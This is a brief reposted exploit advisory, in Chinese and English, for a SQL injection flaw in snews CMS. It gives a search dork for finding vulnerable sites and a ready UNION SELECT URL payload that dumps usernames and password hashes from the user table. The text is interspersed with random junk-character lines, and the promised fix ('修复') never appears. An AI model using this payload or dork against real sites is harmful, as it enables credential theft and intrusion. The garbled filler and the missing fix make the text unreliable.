CMS snews SQL注射及修复

admin

标题: CMS snews SQL Injection Vulnerability
作者: By onestree
下载地址 : http://snewscms.com/
测试平台 : ubuntu 12.10 / win 7
关键词: inurl:"tanyakan pada rumput yang bergoyang"


*************************************************************

SQL poc:
: F8 y% f9 g( m
http://www.2cto.com /snews/snews.php?act=shownews&id=[SQL]

1 c; j  c6 x% n+ c示例
; b* l$ M6 V5 \7 _4 Z4 F8 ]; i+ e* G' Y5 _
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*


致谢:
; R0 `/ W% c' Q! V( a
! q  ~9 `- f6 o5 s  Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
     
          indonesiancoder - moeslimh4x0r - go-coder
7 B6 U+ f; s$ D* h
spesial my hunny :*
# B! |- T) y$ e4 v